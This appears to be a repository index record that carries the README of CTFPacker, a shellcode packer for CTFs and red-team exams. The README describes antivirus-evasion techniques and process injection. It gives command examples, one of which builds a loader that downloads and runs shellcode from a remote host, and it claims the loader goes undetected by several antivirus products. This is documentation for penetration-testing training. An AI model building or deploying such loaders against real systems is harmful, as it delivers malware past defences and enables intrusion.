{"id":27599661,"url":"https://github.com/mochabyte0x/ctfpacker","last_synced_at":"2025-09-02T12:44:52.064Z","repository":{"id":283143945,"uuid":"950356524","full_name":"mochabyte0x/CTFPacker","owner":"mochabyte0x","description":"Cross platform (Linux / Windows) shellcode packer for CTFs and pentest / red team exams aiming for AV evasion !","archived":false,"fork":false,"pushed_at":"2025-08-21T17:17:00.000Z","size":215,"stargazers_count":72,"open_issues_count":0,"forks_count":11,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-08-21T19:58:12.410Z","etag":null,"topics":["antivirus-bypass","antivirus-evasion","evasion-techniques","loader-generator","packer","shellcode","shellcode-loader","shellcode-runner"],"latest_commit_sha":null,"homepage":"","language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mochabyte0x.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2025-03-18T03:15:02.000Z","updated_at":"2025-08-21T17:17:04.000Z","dependencies_parsed_at":"2025-06-12T09:28:34.031Z","dependency_job_id":"75b742c5-1191-4e5d-9db8-645acd4792ee","html_url":"https://github.com/mochabyte0x/CTFPacker","commit_stats":null,"previous_names":["b0lg0r0v/ctfpacker","mochabyte0x/ctfpacker"],"tags_count":4,"template":false,"template_full_name":null,"purl":"pkg:github/mochabyte0x/CTFPacker","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mochabyte0x%2FCTFPacker","tags_url":"https://repos.ecosyste.ms/api/v1
/hosts/GitHub/repositories/mochabyte0x%2FCTFPacker/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mochabyte0x%2FCTFPacker/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mochabyte0x%2FCTFPacker/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mochabyte0x","download_url":"https://codeload.github.com/mochabyte0x/CTFPacker/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mochabyte0x%2FCTFPacker/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":273287590,"owners_count":25078570,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-09-02T02:00:09.530Z","response_time":77,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["antivirus-bypass","antivirus-evasion","evasion-techniques","loader-generator","packer","shellcode","shellcode-loader","shellcode-runner"],"created_at":"2025-04-22T15:40:54.484Z","updated_at":"2025-09-02T12:44:52.005Z","avatar_url":"https://github.com/mochabyte0x.png","language":"C","funding_links":[],"categories":[],"sub_categories":[],"readme":"# CTFPacker\n\n```\n ▄████▄  ▄▄▄█████▓  █████▒██▓███   ▄▄▄       ▄████▄   ██ ▄█▀▓█████  ██▀███  \n▒██▀ ▀█  ▓  ██▒ ▓▒▓██   ▒▓██░  ██▒▒████▄    ▒██▀ ▀█   ██▄█▒ ▓█   ▀ ▓██ ▒ ██▒\n▒▓█    ▄ ▒ ▓██░ ▒░▒████ ░▓██░ ██▓▒▒██  ▀█▄  ▒▓█    ▄ ▓███▄░ ▒███   ▓██ ░▄█ 
▒\n▒▓▓▄ ▄██▒░ ▓██▓ ░ ░▓█▒  ░▒██▄█▓▒ ▒░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█  ▄ ▒██▀▀█▄  \n▒ ▓███▀ ░  ▒██▒ ░ ░▒█░   ▒██▒ ░  ░ ▓█   ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░██▓ ▒██▒\n░ ░▒ ▒  ░  ▒ ░░    ▒ ░   ▒▓▒░ ░  ░ ▒▒   ▓▒█░░ ░▒ ▒  ░▒ ▒▒ ▓▒░░ ▒░ ░░ ▒▓ ░▒▓░\n  ░  ▒       ░     ░     ░▒ ░       ▒   ▒▒ ░  ░  ▒   ░ ░▒ ▒░ ░ ░  ░  ░▒ ░ ▒░\n░          ░       ░ ░   ░░         ░   ▒   ░        ░ ░░ ░    ░     ░░   ░ \n░ ░                                     ░  ░░ ░      ░  ░      ░  ░   ░     \n░                                           ░                               \n```\n## Table-Of-Contents\n\n- [CTFPacker](#ctfpacker)\n  * [Goal](#goal)\n  * [General Information](#general-information)\n  * [Evasion Features](#evasion-features)\n  * [Installation](#installation)\n    + [Makefile](#makefile)\n  * [Usage](#usage)\n    + [Format option](#format-option)\n    + [Staged](#staged)\n    + [Stageless](#stageless)\n    + [Target Process Injection](#target-process-injection)\n  * [Demo](#demo)\n  * [To-Do](#to-do)\n  * [Detections](#detections)\n  * [Credits - References](#credits---references)\n\n## Goal\n\nThis repository has been created to facilitate AV evasion during CTFs and/or pentest \u0026 red team exams. The goal is to focus more on pwning rather than struggling with evasion !\n\nCheck out my blog post for more info: [Evade Modern AVs in 2025](https://mochabyte.xyz/posts/Evade-Modern-AVs-in-2025/)\n\n## General Information\n\n\u003e[!CAUTION]\n\u003eThis tool is designed for authorized operations only. I AM NOT RESPONSIBLE FOR YOUR ACTIONS. DON'T DO BAD STUFF.\n\n\u003e[!NOTE]\n\u003e- The techniques used in the loader are nothing new. The loader generated from this packer will probably NOT evade modern AVs / EDRs. Do not expect that or anything groundbreaking.\n\u003e- Most of the evasion techniques used here are NOT from me. 
I just added a bunch of known stuff together and it is enough for CTFs !\n\u003e- Depending on the interest shown in this project, I might add some techniques from my own research and maybe expand/rewrite the packer entirely.\n\n## Evasion Features\n\n- Indirect Syscalls via SysWhispers (rewritten in NASM-compatible assembly)\n- API Hashing\n- NTDLL unhooking via the Known DLLs technique\n- Custom GetProcAddr \u0026 GetModuleHandle functions\n- Custom AES-128-CBC mode encryption \u0026 decryption\n- EarlyBird APC Injection\n- Possibility to choose between a staged or stageless loader\n- \"Polymorphic\" behavior with the `-s` argument\n\n## Installation\n\nDepending on your OS, the installation will differ slightly. In general, make sure you have the following installed:\n\n- CLANG compiler\n- MinGW-w64 Toolchain\n- Make\n\nIf I am not mistaken, those are installed by default on KALI Linux. However, if you want to install them manually, this should do the trick:\n\n```bash\n# Assuming Debian based system\nsudo apt update\nsudo apt install clang pipx mingw-w64 make lld nasm osslsigncode\n\n# Verify installation\nclang --version\nmake --version\n\n# or\nclang -v\n\n# If this is the case, refer to the chapter \"Makefile\" to replace the compiler in the Makefile of the templates\n```\n\nIt's a bit of a different story on Windows. You need to install the MinGW-w64 toolchain by installing MSYS2 first.\n\n```powershell\n# Go there and install this\nhttps://www.msys2.org/\n\n# Then\npacman -Syu\npacman -S mingw-w64-x86_64-clang\n\n# Verify installation\nx86_64-w64-mingw32-clang --version\n\n# Install make\npacman -S make\n\n# Verify installation\nmake --version\n```\n\nYou should also check under `C:\\msys64\\mingw64\\bin`. This is a common place where the toolchain gets installed.\n\nAfter the basic installation, don't forget to install the Python requirements ! 
Otherwise the packer will not work :D !\n\n**Linux**:\n```bash\n# Via pipx (preferred way)\ncd CTFPacker\npython3 -m pipx install .\n# You can use ctfpacker globally now\n\n# Via manual virtual environment\ncd CTFPacker\npython3 -m venv env\nsource env/bin/activate\npython3 -m pip install .\n\n# Once you're done using the tool\ndeactivate\n\n# Old-fashioned way\ncd CTFPacker\npython3 -m pip install -r requirements.txt --break-system-packages\npython3 main.py -h\n```\n**Windows**:\n```powershell\n# Via pip\ncd CTFPacker\npython3 -m pip install .\n\n# Done ! :)\n```\n\n### Makefile\n\nYou should NOT modify the Makefile unless you know what you are doing ! BUT, there's one thing you should check BEFORE the Python installation process. The first line of the Makefile indicates your compiler. Verify that the compiler matches the one you installed earlier on your system. You can refer to the appropriate Makefile (windows / linux) in this repo.\n\n```makefile\n# Verify this line\nCLANG    := clang\n```\n\nReplace it with the appropriate CLANG compiler.\n\n```makefile\n# Example\nCLANG    := x86_64-w64-mingw32-clang\n```\n\n## Usage\n\nGeneral usage:\n```\nusage: main.py [-h] {staged,stageless} ...\n\nCTFPacker\n\npositional arguments:\n  {staged,stageless}  Staged or Stageless Payloads\n    staged            Staged\n    stageless         Stageless\n\noptions:\n  -h, --help          show this help message and exit\n```\n\nStaged:\n\n```\nusage: main.py staged [-h] -p PAYLOAD [-f {EXE,DLL}] -i IP_ADDRESS -po PORT -pa PATH [-o OUTPUT] [-e] [-s] [-pfx PFX] [-pfx-pass PFX_PASSWORD]\n\noptions:\n  -h, --help            show this help message and exit\n  -p PAYLOAD, --payload PAYLOAD\n                        Shellcode to be packed\n  -f {EXE,DLL}, --format {EXE,DLL}\n                        Format of the output file (default: EXE).\n  -i IP_ADDRESS, --ip-address IP_ADDRESS\n                        IP address from where your shellcode is gonna be fetched.\n  -po PORT, --port PORT\n     
                   Port from where the HTTP connection is gonna fetch your shellcode.\n  -pa PATH, --path PATH\n                        Path from where your shellcode is gonna be fetched.\n  -o OUTPUT, --output OUTPUT\n                        Output path where the shellcode is gonna be saved.\n  -e, --encrypt         Encrypt the shellcode via AES-128-CBC.\n  -s, --scramble        Scramble the loader's functions and variables.\n  -pfx PFX, --pfx PFX   Path to the PFX file for signing the loader.\n  -pfx-pass PFX_PASSWORD, --pfx-password PFX_PASSWORD\n                        Password for the PFX file.\n\nExample usage: python main.py staged -p shellcode.bin -i 192.168.1.150 -po 8080 -pa '/shellcode.bin' -o shellcode -e -s -pfx cert.pfx -pfx-pass 'password'\n```\n\nStageless:\n\n```\nusage: main.py stageless [-h] -p PAYLOAD [-f {EXE,DLL}] [-e] [-s] [-pfx PFX] [-pfx-pass PFX_PASSWORD]\n\noptions:\n  -h, --help            show this help message and exit\n  -p PAYLOAD, --payload PAYLOAD\n                        Shellcode to be packed\n  -f {EXE,DLL}, --format {EXE,DLL}\n                        Format of the output file (default: EXE).\n  -e, --encrypt         Encrypt the shellcode via AES-128-CBC.\n  -s, --scramble        Scramble the loader's functions and variables.\n  -pfx PFX, --pfx PFX   Path to the PFX file for signing the loader.\n  -pfx-pass PFX_PASSWORD, --pfx-password PFX_PASSWORD\n                        Password for the PFX file.\n\nExample usage: python main.py stageless -p shellcode.bin -o shellcode -e -s -pfx cert.pfx -pfx-pass 'password'\n```\n\n### Format option\n\nIn both cases, staged or stageless, you can choose whether to compile your loader as an EXE or a DLL. To compile it as a DLL, simply append `-f DLL`. By default, it compiles as an EXE, though you can also specify this explicitly using `-f EXE` (but you don't need to).\n\nThe DLL version exports a function called `ctf`. This is the function you need to call to start the execution. 
\n\n```powershell\nrundll32.exe ctfloader.dll,ctf\n```\n\n### Staged\n\nWhen using the staged \"mode\", the packer will generate a .bin file named according to your `-o` arg. With the `-pa` argument, you are actually telling the loader *where* on the webserver (basically the path) it should look for that .bin file. So, TL;DR, those two values should usually be the same.\n\nExample:\n\n```powershell\npython main.py staged -p \"C:\\Code\\CTFPacker\\calc.bin\" -i 192.168.2.121 -po 8080 -pa /shellcode.bin -o shellcode -s -pfx cert.pfx -pfx-pass Password\n\n\n\n ▄████▄  ▄▄▄█████▓  █████▒██▓███   ▄▄▄       ▄████▄   ██ ▄█▀▓█████  ██▀███\n▒██▀ ▀█  ▓  ██▒ ▓▒▓██   ▒▓██░  ██▒▒████▄    ▒██▀ ▀█   ██▄█▒ ▓█   ▀ ▓██ ▒ ██▒\n▒▓█    ▄ ▒ ▓██░ ▒░▒████ ░▓██░ ██▓▒▒██  ▀█▄  ▒▓█    ▄ ▓███▄░ ▒███   ▓██ ░▄█ ▒\n▒▓▓▄ ▄██▒░ ▓██▓ ░ ░▓█▒  ░▒██▄█▓▒ ▒░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█  ▄ ▒██▀▀█▄\n▒ ▓███▀ ░  ▒██▒ ░ ░▒█░   ▒██▒ ░  ░ ▓█   ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░██▓ ▒██▒\n░ ░▒ ▒  ░  ▒ ░░    ▒ ░   ▒▓▒░ ░  ░ ▒▒   ▓▒█░░ ░▒ ▒  ░▒ ▒▒ ▓▒░░ ▒░ ░░ ▒▓ ░▒▓░\n  ░  ▒       ░     ░     ░▒ ░       ▒   ▒▒ ░  ░  ▒   ░ ░▒ ▒░ ░ ░  ░  ░▒ ░ ▒░\n░          ░       ░ ░   ░░         ░   ▒   ░        ░ ░░ ░    ░     ░░   ░\n░ ░                                     ░  ░░ ░      ░  ░      ░  ░   ░\n░                                           ░\n\n\n\n        Author: mocha\n        https://mochabyte.xyz\n\n[i] Staged Payload selected.\n[+] Starting the process...\n[i] Corresponding template selected..\n[+] Template files modified !\n[i] Encryption not selected.\n[+] Compiling the loader...\n[i] Scrambling selected.\n[+] Scrambling the loader...\n[+] Loader scrambled !\n[i] Signing selected.\n[+] Signing the loader...\nrm -f *.o *.obj ctfloader.exe\nC:\\msys64\\mingw64\\bin\\clang -static -O0 -Wall -w -c api_hashing.c -o api_hashing.o\nC:\\msys64\\mingw64\\bin\\clang -static -O0 -Wall -w -c download.c -o download.o\nC:\\msys64\\mingw64\\bin\\clang -static -O0 -Wall -w -c inject.c -o inject.o\nC:\\msys64\\mingw64\\bin\\clang 
-static -O0 -Wall -w -c main.c -o main.o\nC:\\msys64\\mingw64\\bin\\clang -static -O0 -Wall -w -c unhook.c -o unhook.o\nC:\\msys64\\mingw64\\bin\\clang -static -O0 -Wall -w -c whispers.c -o whispers.o\nnasm -f win64   whispers-asm.x64.asm -o whispers-asm.o\nC:\\msys64\\mingw64\\bin\\clang -static -O0 -Wall -w -o ctfloader.exe api_hashing.o download.o inject.o main.o unhook.o whispers.o whispers-asm.o -Wl,--disable-auto-import -s -lwinhttp -lntdll\nConnecting to http://timestamp.sectigo.com\nSucceeded\n[+] Loader signed !\n[+] DONE !\n```\n\nWith this command, you're telling the loader to connect to the `192.168.2.121` IP at port `8080` and download the `shellcode.bin` file. So you should serve this file via a webserver.\n\n```powershell\nC:\\Code\\CTFPacker\\CTF Packer\u003els\nshellcode.bin\n\nC:\\Code\\CTFPacker\\CTF Packer\u003epython -m http.server 8080\nServing HTTP on :: port 8080 (http://[::]:8080/) ...\n```\n\n### Stageless\n\nThis is fairly simple. The shellcode will be embedded in the loader. I recommend using the encryption arg `-e`. 
Otherwise the signature-based detection will likely catch it.\n\n```powershell\nC:\\Code\\CTFPacker\u003els\ncore  custom_certs  main.py  requirements.txt templates\n\nC:\\Code\\CTFPacker\u003epython main.py stageless -p \"C:\\Code\\CTFPacker\\calc.bin\" -e -s\n\n\n\n ▄████▄  ▄▄▄█████▓  █████▒██▓███   ▄▄▄       ▄████▄   ██ ▄█▀▓█████  ██▀███\n▒██▀ ▀█  ▓  ██▒ ▓▒▓██   ▒▓██░  ██▒▒████▄    ▒██▀ ▀█   ██▄█▒ ▓█   ▀ ▓██ ▒ ██▒\n▒▓█    ▄ ▒ ▓██░ ▒░▒████ ░▓██░ ██▓▒▒██  ▀█▄  ▒▓█    ▄ ▓███▄░ ▒███   ▓██ ░▄█ ▒\n▒▓▓▄ ▄██▒░ ▓██▓ ░ ░▓█▒  ░▒██▄█▓▒ ▒░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█  ▄ ▒██▀▀█▄\n▒ ▓███▀ ░  ▒██▒ ░ ░▒█░   ▒██▒ ░  ░ ▓█   ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░██▓ ▒██▒\n░ ░▒ ▒  ░  ▒ ░░    ▒ ░   ▒▓▒░ ░  ░ ▒▒   ▓▒█░░ ░▒ ▒  ░▒ ▒▒ ▓▒░░ ▒░ ░░ ▒▓ ░▒▓░\n  ░  ▒       ░     ░     ░▒ ░       ▒   ▒▒ ░  ░  ▒   ░ ░▒ ▒░ ░ ░  ░  ░▒ ░ ▒░\n░          ░       ░ ░   ░░         ░   ▒   ░        ░ ░░ ░    ░     ░░   ░\n░ ░                                     ░  ░░ ░      ░  ░      ░  ░   ░\n░                                           ░\n\n\n\n        Author: mocha\n        https://mochabyte.xyz\n\n[i] Stageless Payload selected.\n[+] Starting the process...\n[+] Template files modified !\n[i] Encryption selected.\n[+] Encrypting the payload...\n[+] Payload encrypted and saved into payload[] variable in main.c !\n[i] Scrambling selected.\n[+] Scrambling the loader...\n[+] Loader scrambled !\nrm -f *.o *.obj ctfloader.exe\nC:\\msys64\\mingw64\\bin\\clang -static -O0 -Wall -w -c api_hashing.c -o api_hashing.o\nC:\\msys64\\mingw64\\bin\\clang -static -O0 -Wall -w -c inject.c -o inject.o\nC:\\msys64\\mingw64\\bin\\clang -static -O0 -Wall -w -c main.c -o main.o\nC:\\msys64\\mingw64\\bin\\clang -static -O0 -Wall -w -c unhook.c -o unhook.o\nC:\\msys64\\mingw64\\bin\\clang -static -O0 -Wall -w -c whispers.c -o whispers.o\nnasm -f win64   whispers-asm.x64.asm -o whispers-asm.o\nC:\\msys64\\mingw64\\bin\\clang -static -O0 -Wall -w -o ctfloader.exe api_hashing.o inject.o main.o unhook.o whispers.o whispers-asm.o 
-Wl,--disable-auto-import -s -lwinhttp -lntdll\n[+] Loader compiled !\n[+] DONE !\n\nC:\\Code\\CTFPacker\u003els\ncore  ctfloader.exe  custom_certs  main.py  requirements.txt  shellcode.bin  templates\n```\n\n### Target Process Injection\n\nI won't go into detail about how the EarlyBird APC Injection technique works, but one thing you should know is that it needs to *create* a process. The current target process is `RuntimeBroker.exe`. IF `RuntimeBroker.exe` is NOT present on the system (for whatever reason; I encountered that in some HTB Pro Labs), you should change the source code and target another process.\n\nTo do that, you can navigate into the `main.c` file (staged or stageless) and modify this value at the top:\n\n```c\n#define TARGET_PROCESS \"RuntimeBroker.exe\"\n```\n\nYou should choose a binary that is present in the `System32` directory. For example, this should also work:\n\n```c\n#define TARGET_PROCESS \"svchost.exe\"\n```\n\nI'll probably add some kind of argument in the future for you to choose between a few target processes.\n\n\u003e[!NOTE]\n\u003e Be aware that some processes will be easier to detect than others. In my experience, doing the APC Injection into `svchost`, for example, is more likely to be caught.  
\n\n## Demo\n\nhttps://github.com/user-attachments/assets/4aa56672-bcfb-424b-aa89-a919b514ae35\n\n## To-Do\n\n- [x] Maybe adding a setup.py file to install via pip / pipx\n- [ ] Other templates with different injection techniques\n- [ ] Adding AMSI / ETW bypass (depends on what injection technique I am going to put here)\n\n## Detections\n\n- Undetected on the latest Windows 11 Defender (2025-03-18, Version 1.425.89.0)\n- Undetected on Windows 10 Defender (2025-03-18, Version 1.425.90.0)\n- Undetected on the latest Sophos Home Premium (Version 2023.2.2.2)\n   ![image](https://github.com/user-attachments/assets/54a5539c-8eb8-490e-a189-33fbf7be9867)\n- Undetected on the latest Kaspersky Premium (20.06.2025)\n\n## Credits - References\n\nMost of the code is not from me. Here are the original authors:\n\n```\n@ Maldevacademy     - https://maldevacademy.com\n@ SaadAhla          - https://github.com/SaadAhla/ntdlll-unhooking-collection\n@ VX-Underground    - https://github.com/vxunderground/VX-API/blob/main/VX-API/GetProcAddressDjb2.cpp\n@ klezVirus         - https://github.com/klezVirus/SysWhispers3\n```\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmochabyte0x%2Fctfpacker","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmochabyte0x%2Fctfpacker","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmochabyte0x%2Fctfpacker/lists"}